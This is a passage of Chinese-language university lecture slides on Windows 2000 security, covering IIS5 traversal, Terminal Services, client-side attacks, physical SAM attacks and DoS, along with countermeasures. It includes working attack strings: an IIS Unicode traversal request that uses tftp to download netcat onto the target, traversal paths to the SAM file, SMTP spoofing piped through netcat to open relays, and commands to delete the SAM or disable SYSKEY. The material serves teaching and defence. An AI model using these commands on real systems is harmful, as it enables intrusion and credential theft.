Windows2000系統(tǒng)安全(2)-網(wǎng)絡(luò)與信息安全

Win2k系統(tǒng)安全(2)胡建斌北京大學(xué)網(wǎng)絡(luò)與信息安全研究室E-mail:hjbin@/~hjbin目錄IIS5的安全終端服務(wù)器安全MicrosoftInternet客戶(hù)端的安全物理攻擊拒絕服務(wù)攻擊安全功能和工具IIS5的安全I(xiàn)IS5基礎(chǔ)－基本HTTPIIS5基礎(chǔ)－CGICGI：CommonGatewayInterface，運(yùn)行在服務(wù)器上的應(yīng)用程序，能針對(duì)每個(gè)請(qǐng)求生成動(dòng)態(tài)的內(nèi)容，擴(kuò)展了Web功能調(diào)用CGI/scripts/cgi.exe?var1+var2Windows中幾乎所有的可執(zhí)行程序都可以作為服務(wù)器端的CGI應(yīng)用程序來(lái)執(zhí)行其中cmd.exe經(jīng)常被作為尋找的目標(biāo)IIS5基礎(chǔ)－ASP和ISAPIASP：ActiveServerPagesISAPI:InterfaceServerApplicationProgrammingInterface調(diào)用ASP/scripts/script.asp?var1=x&var2=y調(diào)用ISAPI/isapi.dll?var1&var2HTTP攻擊伎倆使用../進(jìn)行文件系統(tǒng)遍歷URL的十六進(jìn)制編碼使用../進(jìn)行文件系統(tǒng)遍歷/../../../../winnt/secret.txt通常是在目錄上設(shè)置不當(dāng)?shù)腘TFS訪(fǎng)問(wèn)控制列表所導(dǎo)致的/../../../../winnt/repair/samURL的十六進(jìn)制編碼Http允許URL中使用十六進(jìn)制編碼形式輸入字符串利用URL的十六進(jìn)制編碼攻擊/../../winnt/repair/sam％2F％2E％2E％2F％2E％2E％2Fwinnt/repair/sam能避免入侵檢測(cè)系統(tǒng)的檢測(cè)，或可以導(dǎo)致應(yīng)用程序錯(cuò)誤處理輸入IIS5緩沖區(qū)溢出IPP緩沖區(qū)溢出索引服務(wù)ISAPI擴(kuò)展緩沖區(qū)溢出CodeRed蠕蟲(chóng)ida/idq緩沖區(qū)溢出FrontPage2000服務(wù)器擴(kuò)展緩沖區(qū)溢出安全對(duì)策在系統(tǒng)驅(qū)動(dòng)器之外的驅(qū)動(dòng)器上安裝Web文件夾Web服務(wù)器所在的卷應(yīng)使用NTFS并謹(jǐn)慎設(shè)置ACL移動(dòng)、刪除或改名可能被利用的可執(zhí)行文件：cacls,xcacls在服務(wù)器的Write和ExecuteACL中刪除Everyone和UsersGroup掌握對(duì)日志中攻擊標(biāo)志的分析將文件寫(xiě)入Web服務(wù)器如在目標(biāo)機(jī)上建立tftp服務(wù)器，然后上載文件：GET/scripts/..%c0%af../winnt/system32/tftp.exe?“-i”+1+GET+nc.exec:\nc.exeHTTP/1.0

將netcat寫(xiě)入到C:\，因?yàn)槟J(rèn)情況下所有用戶(hù)對(duì)C:\具有寫(xiě)權(quán)限如將目標(biāo)機(jī)器上cmd.exe改名為cmdl.exeGET/scripts/..%c0%af../winnt/system32/cmd.exe?+copy+c:\winnt\system32\cmd.exe+c:\cmdl.exeHTTP/1.0其它自動(dòng)上載工具：如unicodeloader等通過(guò)IIS5提升權(quán)限通過(guò)InProcesslsapiApps利用RevertToSelf安裝MS01-026補(bǔ)丁可以解決源代碼泄漏攻擊起因IIS中的程序缺陷低劣的Web編程技術(shù)常見(jiàn)的漏洞+.htr(ism.dll)Webhits(webhits.dll)Translate:f(WebDAV,httpext.dll)WebDAV目錄列表（httpext.dll)Web服務(wù)器安全評(píng)估工具Web服務(wù)器安全忠告Web服務(wù)器安全忠告在系統(tǒng)卷之外建立一個(gè)獨(dú)立的卷來(lái)存放Web根目錄Web服務(wù)器所在的卷應(yīng)使用NTFS文件系統(tǒng)，明確的設(shè)置ACL刪除Everyone、Users和其它非特權(quán)組所在目錄上的寫(xiě)文件和執(zhí)行文件權(quán)限不要將私有數(shù)據(jù)保存在ASP文件或包含有文件中停止AdministrationWeb站點(diǎn)，刪除IISAdmin和IISHelp虛擬目錄以及它們對(duì)應(yīng)的真實(shí)目錄目錄IIS5的安全終端服務(wù)器安全MicrosoftInternet客戶(hù)端的安全物理攻擊拒絕服務(wù)攻擊安全功能和工具終端服務(wù)器安全TSTSTS緊密集成在操作系統(tǒng)內(nèi)部，免費(fèi)提供遠(yuǎn)程管理模式(最多有兩個(gè)同時(shí)連接的會(huì)語(yǔ)以及一個(gè)控制臺(tái))TS可以在你和服務(wù)器之間提供不同的認(rèn)證和加密方法。對(duì)Windows2000來(lái)說(shuō)，終端服務(wù)器正在逐漸成為與UNIX世界中的SSH一樣重要的圖形化產(chǎn)品TS的代價(jià)

在本節(jié)中，我們將從安全的角度來(lái)考查T(mén)S的基本功能、如何識(shí)別和枚舉TS、解決不合理的TS實(shí)現(xiàn)的問(wèn)題、已知的針對(duì)TS的攻擊，以及在網(wǎng)絡(luò)環(huán)境中保護(hù)和管理TS的基本知識(shí)TS組件服務(wù)器遠(yuǎn)程桌面協(xié)議(RemoteDesktopProtocol，RDP)客戶(hù)端TS服務(wù)器TS集成在所有Windows2000服務(wù)器中，通過(guò)控制面板中的Windows組件功能可以很容易地啟用和禁用在以管理模式安裝時(shí)，服務(wù)器是標(biāo)準(zhǔn)的組件；當(dāng)作為遠(yuǎn)程應(yīng)用程序服務(wù)器時(shí)，它需要額外的授權(quán)費(fèi)用和架構(gòu)服務(wù)器的默認(rèn)監(jiān)聽(tīng)端口為T(mén)CP3389(稍后將會(huì)介紹自行指定端口是很容易的)遠(yuǎn)程桌面協(xié)議(RDP)在客戶(hù)端和服務(wù)器之間的數(shù)據(jù)傳輸是通過(guò)Microsoft的基于TCP的遠(yuǎn)程桌面協(xié)議(RDP-5)進(jìn)行的RDP提供了三層加密以確保點(diǎn)對(duì)點(diǎn)數(shù)據(jù)傳輸?shù)陌踩裕?0、56或128位RC4與WindowsNT版本的RDP-4相比，Windows2000提供了更多的基本功能，可以在大多數(shù)的網(wǎng)絡(luò)環(huán)境中高效的使用客戶(hù)端通過(guò)MS安裝程序(MSI)軟件包安裝的獨(dú)立的16位或32位可執(zhí)行文件終端服務(wù)高級(jí)客戶(hù)端(TerminalServicesAdvancedAlient，TSAC)，基于Win32的ActiveX控件，可以在Web頁(yè)面中使用MMC管理單元

盡管它們互相之間存在明顯的區(qū)別，但各種不同的客戶(hù)端都用完全相同的方法來(lái)實(shí)現(xiàn)RDP。因此，盡管它們看起來(lái)似乎不一樣，但所有的TS客戶(hù)端在與服務(wù)器進(jìn)行對(duì)話(huà)時(shí)都以完全相同的方式進(jìn)行操作修改TS監(jiān)聽(tīng)端口－服務(wù)器端通過(guò)修改下面的注冊(cè)表鍵值，TS的默認(rèn)端口可以重新指定

\HKLM\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp鍵值：PortNumberREG_DWORD=3389修改TS監(jiān)聽(tīng)端口－客戶(hù)端第一步是在TS客戶(hù)端連接管理器中與目標(biāo)主機(jī)建立連接一旦創(chuàng)建了一個(gè)連接之后，選定該連接并從File菜單中選擇Export，將全部配置設(shè)置保存到以一個(gè)CNS為擴(kuò)展名的文本文件中去使用文本編輯器打開(kāi)這個(gè)文件，將ServerPort修改為在服務(wù)器上指定端口，如下例所示(自定義連接端口為7777)

修改TS監(jiān)聽(tīng)端口－客戶(hù)端[CorpTermServ]WinPosStr=0,2,0,0,941,639Expand=1SmoothScrolling=0ShadowBitmapEnabled=1DedicatedTerminal=0ServerPort=7777EnableMouse=1[etc.]

識(shí)別和查找TS3389端口掃描TSProbeTSEnum

攻擊TS密碼猜測(cè)攻擊用戶(hù)權(quán)限提升畸形RDP拒絕服務(wù)攻擊

密碼猜測(cè)攻擊-TSGrinder.exeTS登錄等價(jià)于真正的交互式登錄，因此對(duì)真正的Administrator賬戶(hù)是不能設(shè)置鎖定閾值的。這意味著在啟用了TS服務(wù)的情況下，對(duì)密碼猜測(cè)攻擊來(lái)說(shuō)，本地Administrator賬戶(hù)是一個(gè)最易受攻擊的目標(biāo)TimMullen開(kāi)發(fā)了TSGrinder的工具，它能夠通過(guò)TS對(duì)本地Administrator賬戶(hù)進(jìn)行字典攻擊密碼猜測(cè)攻擊-TSGrinder.exe密碼猜測(cè)攻擊的防御推薦將本地Administrator賬戶(hù)改名防御TS密碼猜測(cè)攻擊的另一種有趣的方法是為Windows登錄窗口制作一個(gè)自定義的法律聲明，通過(guò)添加或編輯如下的注冊(cè)表鍵值就可以實(shí)現(xiàn)：HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WinLogon

用戶(hù)權(quán)限提升推薦實(shí)現(xiàn)Windows2000ResourceKit中的一些關(guān)鍵功能其中最重要的是，“Appsec”可以使管理員能夠限制用戶(hù)只能運(yùn)行特定的應(yīng)用程序這能夠減小攻擊者在獲取本地用戶(hù)訪(fǎng)問(wèn)之后進(jìn)行權(quán)限提升攻擊的危險(xiǎn)

IME遠(yuǎn)程Root獲取輸入法編輯器(InputMethodEditor，IME)漏洞，這個(gè)漏洞導(dǎo)致可以不用提供任何憑據(jù)就能通過(guò)TS的認(rèn)證IME用來(lái)將標(biāo)準(zhǔn)的101鍵鍵盤(pán)映射到某種語(yǔ)言中的大量可用字符，例如日語(yǔ)、中文和韓國(guó)語(yǔ)都需要IME。雖然IME通常在本地用戶(hù)的上下文中進(jìn)行正常操作，但登錄時(shí)，IME卻在SYSTEM上下文中運(yùn)行。這使得通過(guò)遠(yuǎn)程服務(wù)器的登錄屏幕運(yùn)行精心設(shè)計(jì)的命令成為可能IME對(duì)策只有簡(jiǎn)體中文版系統(tǒng)或在初始安裝過(guò)程中安裝了簡(jiǎn)體中文IME的系統(tǒng)才會(huì)有這個(gè)漏洞Microsoft發(fā)布的公告MS00-069和補(bǔ)丁能夠?yàn)樗惺苡绊懙陌姹窘鉀Q這個(gè)問(wèn)題畸形RDP拒絕服務(wù)2001年1月，YoichiUbukata和YoshihiroKawabata發(fā)現(xiàn)了RDP中的一個(gè)漏洞，這個(gè)漏洞可能導(dǎo)致拒絕服務(wù)的情況出現(xiàn)。如果攻擊者發(fā)送一種畸形的報(bào)文，它將使RDP癱瘓。這種攻擊會(huì)導(dǎo)致當(dāng)前正在進(jìn)行的全部工作丟失，并且需要重新啟動(dòng)系統(tǒng)才能恢復(fù)服務(wù)Microsoft發(fā)布了一個(gè)補(bǔ)丁(MS01-006)，通過(guò)修改終端服務(wù)器服務(wù)使它正確地處理數(shù)據(jù)，從而消除這個(gè)漏洞目錄IIS5的安全終端服務(wù)器安全MicrosoftInternet客戶(hù)端的安全物理攻擊拒絕服務(wù)攻擊安全功能和工具M(jìn)icrosoftInternet

客戶(hù)端安全攻擊類(lèi)型緩沖區(qū)溢出，可被用來(lái)執(zhí)行任意的代碼而無(wú)需與用戶(hù)進(jìn)行任何交互通過(guò)欺騙、強(qiáng)制或暗中執(zhí)行命令，使用戶(hù)運(yùn)行由攻擊者預(yù)先選擇的可執(zhí)行內(nèi)容。這種方法有以下一些變化：

■

巧妙偽裝的、看起來(lái)無(wú)害的電子郵件附件■ 嵌入在HTMLWeb頁(yè)面或電子郵件中的可執(zhí)行內(nèi)容■ 活動(dòng)內(nèi)容技術(shù)的漏洞導(dǎo)致非法代碼的執(zhí)行■ ActiveX控件，尤其是那些標(biāo)記有“可以在腳本中安全使用”的控件■

Java虛擬機(jī)的程序缺陷(BrownOrifice)攻擊類(lèi)型訪(fǎng)問(wèn)腳本/自動(dòng)化接口，例如Outlook地址簿蠕蟲(chóng)寫(xiě)本地文件，通常是在可執(zhí)行的目錄中；經(jīng)常通過(guò)臨時(shí)目錄或緩存位置的不適當(dāng)泄露發(fā)生。一旦在本地寫(xiě)入文件，它就可以執(zhí)行并運(yùn)行在本地計(jì)算機(jī)安全區(qū)域的上下文中，從而是完全受到信任的讀取本地文件，例如通過(guò)HTML跨幀導(dǎo)航問(wèn)題或使用IFRAME。這種技術(shù)的一個(gè)常見(jiàn)結(jié)果是從Web瀏覽器的cookie中獲取用戶(hù)的密碼數(shù)據(jù)調(diào)用客戶(hù)端出站連接實(shí)現(xiàn)Internet客戶(hù)端攻擊惡意Web頁(yè)面客戶(hù)端的一種最常見(jiàn)形式是在Internet上部署惡意的Web服務(wù)器，存放經(jīng)過(guò)精心設(shè)計(jì)的內(nèi)容，用來(lái)誘騙用戶(hù)的數(shù)據(jù)這種方法的有效性取決于提高惡意Web站點(diǎn)/頁(yè)面的訪(fǎng)問(wèn)量，這通常是通過(guò)電子郵件或新聞組/列表文章來(lái)進(jìn)行的惡意E-mail由于HTML功能的多樣性(嵌入小程序或控件、活動(dòng)腳本、跨幀瀏覽、內(nèi)聯(lián)幀、cookie解析等等)，HTML電子郵件成為理想的攻擊媒介由于接收端的漏洞導(dǎo)致這樣的問(wèn)題，Microsoft雖然備受指責(zé)，然而通過(guò)Outlook或OutlookExpress(OE)這樣的程序發(fā)送惡意編寫(xiě)的HTML卻十分困難。這些圖形化的電子郵件客戶(hù)端不允許對(duì)郵件消息的內(nèi)容進(jìn)行直接的操作，而為實(shí)現(xiàn)攻擊目的卻需要這樣做如果要在Windows上模擬這種命令行功能，可以通過(guò)命令行提示符直接向簡(jiǎn)單郵件傳輸協(xié)議(SimpleMailTransferProtocol，SMTP)服務(wù)器手動(dòng)發(fā)送消息。最佳的辦法是將適當(dāng)?shù)腟MTP命令和數(shù)據(jù)寫(xiě)入到一個(gè)文本文件中，然后通過(guò)管道輸入給netcatEmailHacking首先，將所需的SMTP命令和消息數(shù)據(jù)寫(xiě)入到一個(gè)文件中helomailfrom:<mallory@>rcptto:<hapless@>datasubject:Readthis!Importance:highMIME-Version:1.0Content-Type:text/html;charset=us-asciiContent-Transfer-Encoding:7bit<HTML><h2>HelloWorld!</h2></HTML>.quitEmailHacking然后在命令行中將這個(gè)文件通過(guò)管道傳遞給netcat，而netcat則應(yīng)該指向適當(dāng)?shù)泥]件服務(wù)器的SMTP監(jiān)聽(tīng)端口25，例如：C:\>typemalicious.txt|nc-vv25EmailHacking惡意的攻擊者通常會(huì)選擇一些提供無(wú)限制的SMTP消息中繼的不引人注意的郵件服務(wù)器，而且會(huì)盡可能隱藏他們自己的源IP地址，這樣就不可能通過(guò)郵件服務(wù)器的日志來(lái)追查到他們這樣的“開(kāi)放式SMTP中繼”通常被垃圾郵件所利用，在Usenet的討論或上經(jīng)常可以找到這樣的服務(wù)器EmailHacking如果希望隨HTML格式的消息發(fā)送一個(gè)附件，則必須向消息中添加另一個(gè)MIME部分，根據(jù)MIME規(guī)范(RFC2045-49)用Base64格式對(duì)附件進(jìn)行編碼用以自動(dòng)完成這項(xiàng)工作的最佳工具是JohnG.Myers的mpack。mpack能夠自動(dòng)添加正確的MIME頭，這樣它的輸出就可以直接發(fā)送給SMTP服務(wù)器下面的例子使用mpack對(duì)一個(gè)名為plant.txt的文件進(jìn)行編碼，輸出到文件plant.mim中?？蛇x的-s參數(shù)用以指定消息的主題行

C:\>mpack-sNasty-gram-oplant.mimplant.txtEmailHacking下面將MIME部分插入到現(xiàn)有的HTML格式的消息中去對(duì)前面的malicious.txt來(lái)說(shuō)，使用“Content-Type:”一行中自定義的MIME邊界來(lái)劃分該消息。MIME邊界以?xún)蓚€(gè)連字符開(kāi)始，結(jié)束邊界以?xún)蓚€(gè)連字符為后綴。還要注意嵌套的“multipart/alternative”MIME部分(boundary2)，這樣Outlook接收者就能夠正確地對(duì)HTML消息正文進(jìn)行解碼一定要十分注意換行的位置，因?yàn)镸IME的解析根據(jù)它們的位置有著很大的不同。這個(gè)消息的重要性被設(shè)置為high(高)，這是誘使受害者上當(dāng)受騙的一個(gè)伎倆EmailHackingEmailHacking使用管道將這個(gè)文件輸入給netcat，并發(fā)送給開(kāi)放的SMTP服務(wù)器，就能夠向hapless@發(fā)送一封HTML格式的消息，并包含附件plant.txt要更好地理解多部分消息中的MIME邊界，參考RFC2046的第5.1.1節(jié)。在OutlookExpress中對(duì)收到的消息進(jìn)行研究，也可以進(jìn)一步了解其格式單擊Properties|Details|MessageSource就可以查看原始數(shù)據(jù)(Outlook不允許查看全部的原始SMTP數(shù)據(jù))緩沖區(qū)溢出如果在每天使用的軟件——電子郵件客戶(hù)端中存在緩沖區(qū)溢出的漏洞，那么問(wèn)題就很可怕了。在漏洞得到修正之前，任何使用存在問(wèn)題的軟件的人都將成為目標(biāo)2000年7月18日；UndergroundSecuritySystemsResearch(USSR)公布了GMT令牌緩沖區(qū)溢出漏洞，Outlook和OutlookExpress(OE)的用戶(hù)隨之發(fā)現(xiàn)了這一點(diǎn)。通過(guò)將GMT令牌放在郵件消息的日期字段中并寫(xiě)入一個(gè)超長(zhǎng)的值，Outlook和OE就會(huì)在POP3和IMAP4下載這樣的消息時(shí)崩潰。如果可以發(fā)送精心設(shè)計(jì)的日期字段，攻擊者選定的程序就可以封裝在GMT值中并執(zhí)行Outlook用戶(hù)需要預(yù)覽、閱讀、回復(fù)或轉(zhuǎn)發(fā)這樣的消息；OE用戶(hù)簡(jiǎn)單地打開(kāi)含有該消息的文件夾，在消息處理時(shí)就會(huì)自動(dòng)發(fā)生——OE就會(huì)永久性地崩潰，除非清除郵箱Outlook/OEvCard緩沖區(qū)溢出這個(gè)問(wèn)題最早由JoelMoses發(fā)現(xiàn)，通過(guò)打開(kāi)特定字段中含有大量文本數(shù)據(jù)的vCards，就可以利用InternetExplorer中的緩沖區(qū)溢出vCards是1996年發(fā)明的一種電子名片格式，1998年進(jìn)入RFCvCards以.vcf為文件擴(kuò)展名。因?yàn)樵谧x取vCards時(shí)必須解析大量的數(shù)據(jù)字段，因此它們成為緩沖區(qū)溢出攻擊的最佳目標(biāo)Outlook/OEvCard緩沖區(qū)溢出盡管受害者必須顯式地運(yùn)行vCard，但由于它是一種方便的個(gè)人數(shù)據(jù)交換格式，因此大多數(shù)人都不會(huì)有任何的猶豫在默認(rèn)情況下，Outlook會(huì)直接從郵件附件運(yùn)行vCards而不對(duì)用戶(hù)進(jìn)行提示，除非安裝了Office安全更新。在直接打開(kāi)磁盤(pán)上的.vcf文件時(shí)，不會(huì)出現(xiàn)提示Outlook/OEvCard緩沖區(qū)溢出vCards采用非常簡(jiǎn)單的ASCII結(jié)構(gòu)，下面的例子是一個(gè)名為JohnDoe.vcf的vCard(為了簡(jiǎn)明起見(jiàn)，刪除了一些可選的字段)：Outlook/OEvCard緩沖區(qū)溢出如果可選的BDAY(生日)字段超過(guò)55個(gè)字符，運(yùn)行它就會(huì)導(dǎo)致Outlook終止并溢出含有大量文本數(shù)據(jù)的EMAIL字段也會(huì)導(dǎo)致同樣的結(jié)果，而在N(姓名)字段中填入大量的文本數(shù)據(jù)會(huì)導(dǎo)致Outlook占用99%的系統(tǒng)CPU資源主要的問(wèn)題似乎在于Outlook的地址簿，它在試圖從vCard導(dǎo)入超長(zhǎng)的字段時(shí)發(fā)生阻塞。用戶(hù)將存在問(wèn)題的vCard復(fù)制到他們的Outlook/OE的聯(lián)系人文件夾中，通過(guò)Windows資源管理器，或通過(guò)嵌入在Web頁(yè)面或電子郵件消息中的鏈接打開(kāi)它時(shí)，也會(huì)發(fā)生問(wèn)題其它緩沖區(qū)溢出Windows媒體播放器.asx緩沖區(qū)溢出GeorgiGuninski和RichardSmith發(fā)現(xiàn)的ActiveX“SafeforScripting（腳本安全）”問(wèn)題Access數(shù)據(jù)庫(kù)實(shí)例化IE5中執(zhí)行VBA代碼寫(xiě)本地文件將文件寫(xiě)入本地磁盤(pán)，如果能夠?qū)懭肴我獾奈募缓笥帜軌驁?zhí)行它們，那么麻煩就大了。如果文件已經(jīng)寫(xiě)入到磁盤(pán)上，那么只有文件系統(tǒng)ACL和它們與用戶(hù)賬戶(hù)權(quán)限的交集能夠確定哪些能夠被執(zhí)行而哪些不能，因此只要過(guò)了第一關(guān)，第二步就很容易了。這種攻擊的一種聰明的變種是識(shí)別磁盤(pán)上可以可靠地寫(xiě)入數(shù)據(jù)的靜態(tài)位置——例如，Internet臨時(shí)緩存文件的名稱(chēng)和位置是可以預(yù)測(cè)的。這使得攻擊者可以實(shí)現(xiàn)“選定文件內(nèi)容”攻擊，在文件里面他們可以精心設(shè)計(jì)惡意的腳本或是其他提交給Internet客戶(hù)端的指令，以便可以寫(xiě)入到這些可預(yù)測(cè)的位置之一。一旦完成了這一步，那么通過(guò)IFRAME或其他的技術(shù)從已知的位置執(zhí)行這些腳本就很容易了執(zhí)行被寫(xiě)入臨時(shí)Internet緩存的.chm文件GeorgiGuninski的第28號(hào)公告描述了這個(gè)漏洞。它涉及到4個(gè)基本的步驟，它們都是在IE或Outlook/OE中裝載HTML時(shí)進(jìn)行的：1. 使用一些HTML代碼，向IE的Internet臨時(shí)文件緩存中寫(xiě)入一系列相同的經(jīng)過(guò)特殊設(shè)計(jì)的已編譯HTML幫助文件(.chm)2. 從第一份HTML文檔中，裝載第二份HTML文檔，第二份文檔位于另一臺(tái)服務(wù)器上，該服務(wù)器的名稱(chēng)與存放父文檔的服務(wù)器的名稱(chēng)不同3. 識(shí)別Internet臨時(shí)緩存文件夾的位置4. 在查點(diǎn)出的緩存文件夾中執(zhí)行.chm文件通用對(duì)策仔細(xì)配置出站網(wǎng)關(guān)訪(fǎng)問(wèn)控制，阻塞除由公司策略明顯允許的通信之外的全部通信?？蛻?hù)端攻擊的最可怕的一種可能就是調(diào)用與惡意服務(wù)器之間的出站連接在不安全的協(xié)議上，例如telnet或SMB不要在重要的服務(wù)器

上讀取郵件或?yàn)g覽Web不要在重要的服務(wù)器上安裝MicrosoftOffice在瀏覽Web和讀取郵件時(shí)，盡可能使用非特權(quán)用戶(hù)身份，而不要用Administrator通用對(duì)策堅(jiān)持原則——不要點(diǎn)擊不可信的鏈接或查看不可信的電子郵件附件，最好將其刪除一定要及時(shí)升級(jí)Internet客戶(hù)端軟件。目前，使用Windows更新站點(diǎn)來(lái)自動(dòng)檢測(cè)和安裝你需要的補(bǔ)丁(Microsoft計(jì)劃在2001年夏天推出一個(gè)新的工具，以幫助用戶(hù)確定他們的IE/OE和Outlook需要安裝哪些補(bǔ)丁)。在編寫(xiě)本書(shū)時(shí)，IE5.5是Microsoft的核心Internet客戶(hù)端的最新版本，并且ServicePack1也已經(jīng)發(fā)布。在IE中，檢查Help|About以查看已經(jīng)安裝了哪些補(bǔ)丁，并且確保你正在使用128位加密強(qiáng)度通用對(duì)策不要忘了及時(shí)到Office更新站點(diǎn)上對(duì)Office進(jìn)行更新。特別的，確保你已經(jīng)安裝了Outlook電子郵件安全更新適當(dāng)?shù)脑O(shè)置IE的SecurityZone，包括禁用RestrictedSite區(qū)域中的全部功能，然后配置Outlook/OE使用該區(qū)域讀取電子郵件將安全策略中的Windows2000LANManager認(rèn)證級(jí)別設(shè)置為SendNTLMv2ResponseOnly。這能夠降低對(duì)SMB認(rèn)證進(jìn)行竊聽(tīng)攻擊的危險(xiǎn)(但不能阻止惡意服務(wù)器和MITM攻擊)通用對(duì)策禁用Windows2000telnet客戶(hù)端的NTLM認(rèn)證(在命令行中執(zhí)行telnet命令，然后輸入unsetntlm，然后用quit退出)。這能夠避免在對(duì)telnet://鏈接進(jìn)行反應(yīng)時(shí)NTLM憑據(jù)在網(wǎng)絡(luò)上傳播在所有的Office應(yīng)用程序的Tools|Macro|Security中將宏安全性設(shè)置為High(高)。這有助于避免Office文檔中的惡意宏腳本進(jìn)行的攻擊通用對(duì)策在客戶(hù)端和郵件服務(wù)器上，及時(shí)更新防病毒標(biāo)識(shí)數(shù)據(jù)庫(kù)部署基于網(wǎng)關(guān)和郵件服務(wù)器的過(guò)濾系統(tǒng)，剔除Web頁(yè)面和電子郵件中的惡意內(nèi)容如果這些提示沒(méi)能使你感到安全，那么不要再使用MicrosoftInternet客戶(hù)端(如果你運(yùn)行Windows2000，那么實(shí)際上這是不可能的)目錄IIS5的安全終端服務(wù)器安全MicrosoftInternet客戶(hù)端的安全物理攻擊拒絕服務(wù)攻擊安全功能和工具物理攻擊物理攻擊如果入侵者能夠不受限制地在物理上訪(fǎng)問(wèn)一臺(tái)Windows2000系統(tǒng)，那么他們?nèi)绾芜M(jìn)行攻擊呢？本節(jié)將從物理的角度探討攻擊者如何從Windows2000獲取數(shù)據(jù)，通常的方法是引導(dǎo)到另外的操作系統(tǒng)并在離線(xiàn)的狀態(tài)下對(duì)系統(tǒng)的屬性進(jìn)行編輯對(duì)SAM進(jìn)行離線(xiàn)攻擊破解通常依賴(lài)于獲取NT/2000的密碼數(shù)據(jù)庫(kù)——安全賬戶(hù)管理器(SecurityAccountsManager，SAM)文件通過(guò)離線(xiàn)攻擊，SAM的內(nèi)容也可以被壞人獲取，只需引導(dǎo)到另一種操作系統(tǒng)，然后將SAM復(fù)制到可移動(dòng)媒體或網(wǎng)絡(luò)共享中首先介紹一些經(jīng)典的離線(xiàn)攻擊技術(shù)，然后分析這些攻擊對(duì)EFS潛在的影響。最后，討論EFS攻擊的一個(gè)例子，它不需要在離線(xiàn)狀態(tài)下訪(fǎng)問(wèn)系統(tǒng)通過(guò)刪除SAM廢除Administrator密碼通過(guò)在系統(tǒng)處于離線(xiàn)狀態(tài)時(shí)刪除SAM文件，然后就可以在系統(tǒng)重新啟動(dòng)后以空密碼登錄Administrator賬戶(hù)。這種方法同時(shí)也刪除了目標(biāo)系統(tǒng)上所有現(xiàn)有的用戶(hù)賬戶(hù)，但與磁盤(pán)上的重要數(shù)據(jù)相比，攻擊者并不考慮這一點(diǎn)這種攻擊有多種實(shí)現(xiàn)方式，但最直接的方法是制作一張可引導(dǎo)的DOS系統(tǒng)軟盤(pán)，并將Sysinternal的ntfsdospro復(fù)制到軟盤(pán)上。然后這張軟盤(pán)就可以用來(lái)將目標(biāo)系統(tǒng)引導(dǎo)到DOS通過(guò)刪除SAM廢除Administrator密碼如果目標(biāo)系統(tǒng)使用FAT或FAT32，那么只需輸入以下命令就可以刪除SAM文件：

A:\>delc:\winnt\system32\config\sam如果目標(biāo)系統(tǒng)使用NTFS文件系統(tǒng)，那么可以使用ntfsdospro將NTFS卷裝載到DOS中，然后使用相同的命令來(lái)刪除SAM通過(guò)刪除SAM廢除Administrator密碼當(dāng)系統(tǒng)稍后重新啟動(dòng)時(shí)，Windows2000將重新創(chuàng)建一個(gè)默認(rèn)的SAM文件，它含有Administrator賬戶(hù)，而且密碼為空。只需使用這個(gè)賬戶(hù)和密碼登錄，就可以獲得對(duì)系統(tǒng)的全面控制這里需要注意的是，刪除SAM并不會(huì)影響Windows2000域控制器，因?yàn)樗鼈儧](méi)有把密碼散列保存在SAM中。然而，Grace和Bartlett的文章指出了一種方法，通過(guò)在域控制器上安裝另一份Windows2000，就可以獲得基本相同的效果通過(guò)使用chntpw對(duì)SAM進(jìn)行散列注入如果你希望使用更為成熟的物理攻擊方法，不想破壞掉系統(tǒng)中全部的賬戶(hù)，可以使用一張Linux引導(dǎo)軟盤(pán)和PetterNordahl-Hagen的chntpw，在離線(xiàn)狀態(tài)將密碼散列注入到SAM中即使在應(yīng)用了SYSKEY時(shí)，或即使選擇了用密碼來(lái)保護(hù)SYSKEY或?qū)⑺４嬖谲洷P(pán)上的選項(xiàng)，注入仍然能夠奏效！通過(guò)使用chntpw對(duì)SAM進(jìn)行散列注入Petter說(shuō)明了如何將SYSKEY關(guān)閉。更糟的是，他發(fā)現(xiàn)攻擊者并不需要這樣做——只需將舊的、未經(jīng)SYSKEY處理的散列直接注入到SAM中，在重新啟動(dòng)后，它就會(huì)自動(dòng)被轉(zhuǎn)換為SYSKEY散列關(guān)閉SYSKEY的方法1. 將HKLM\System\CurrentControlSet\Control\Lsa\SecureBoot設(shè)置為0以禁用SYSKEY(這個(gè)鍵的可能取值為：0——禁用；1——不受保護(hù)的密鑰保存在注冊(cè)表中；2——密鑰保存在注冊(cè)表中，受密碼保護(hù)；3——密鑰保存在軟盤(pán)上)2. 將二進(jìn)制結(jié)構(gòu)HKLM\SAM\Domains\Account\F中的一個(gè)特殊標(biāo)志位修改為以前SecureBoot的相同模式。在系統(tǒng)處于運(yùn)行狀態(tài)時(shí)，這個(gè)主鍵是不能訪(fǎng)問(wèn)的3. 在Windows2000中，HKLM\security\Policy\PolSecretEncryptionKey\<default>主鍵也需要被修改為與以前的兩個(gè)主鍵相同的值通過(guò)使用chntpw對(duì)SAM進(jìn)行散列注入根據(jù)Petter的說(shuō)法，在NT4SP6之前的系統(tǒng)上只修改前兩個(gè)值中的一個(gè)會(huì)導(dǎo)致在完全引導(dǎo)之后出現(xiàn)一個(gè)警告，指出SAM和系統(tǒng)設(shè)置之間的不一致性，SYSKEY會(huì)被重新啟用。而在Windows2000上，在重新啟動(dòng)之后，這3個(gè)鍵值之間的不一致似乎直接被重置為最可能的值目錄IIS5的安全終端服務(wù)器安全MicrosoftInternet客戶(hù)端的安全物理攻擊拒絕服務(wù)攻擊安全功能和工具拒絕服務(wù)攻擊拒絕服務(wù)(DenialofService，DoS)攻擊并不是以竊取用戶(hù)賬戶(hù)或系統(tǒng)數(shù)據(jù)為直接目的，而是使系統(tǒng)拒絕合法用戶(hù)對(duì)系統(tǒng)服務(wù)的訪(fǎng)問(wèn)DoS可以有很多種形式，例如通過(guò)耗盡系統(tǒng)資源，使合法用戶(hù)訪(fǎng)問(wèn)站點(diǎn)的請(qǐng)求失敗，或者通過(guò)一個(gè)精心制作的與RFC不兼容的報(bào)文導(dǎo)致操作系統(tǒng)的掛起在某些情況下，如果攻擊需要目標(biāo)計(jì)算機(jī)重新啟動(dòng)才能完成，DoS實(shí)際上被用來(lái)輔助對(duì)系統(tǒng)的入侵TCP連接淹沒(méi)TCP連接淹沒(méi)（connectflood）方法有時(shí)也被稱(chēng)為進(jìn)程表攻擊（processtableattack）。顧名思義，這種方法是與目標(biāo)之間建立盡可能多的TCP連接，直到目標(biāo)由于資源耗盡而不能再為請(qǐng)求提供服務(wù)為止TCP連接淹沒(méi)比曾經(jīng)流行的TCPSYN淹沒(m